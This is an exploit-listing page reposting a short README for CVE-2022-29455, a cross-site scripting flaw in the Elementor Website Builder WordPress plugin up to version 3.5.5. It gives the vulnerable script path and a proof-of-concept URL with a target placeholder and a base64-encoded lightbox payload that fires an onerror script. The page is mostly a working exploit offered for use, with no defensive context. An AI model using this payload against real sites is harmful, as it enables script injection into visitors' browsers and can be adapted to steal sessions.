Sploitus

Exploit for Cross-site Scripting in Elementor Website Builder

githubexploit · 2023-02-12

Exploit Code

README12 lines
## https://sploitus.com/exploit?id=A699B386-04EB-5FA9-B5B2-259DBE27BEED
# CVE-2022-29455

Wordpress Vulnerability - XSS ( Cross-Site Scripting )

## **Vulnerability Location**
```https://add your target here/wp-content/plugins/elementor/assets/js/frontend.min.js```

## Vulnerable Version <= 3.5.5 versions

## **Proof of Concept (Exploit)**
```https://add your target here/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=```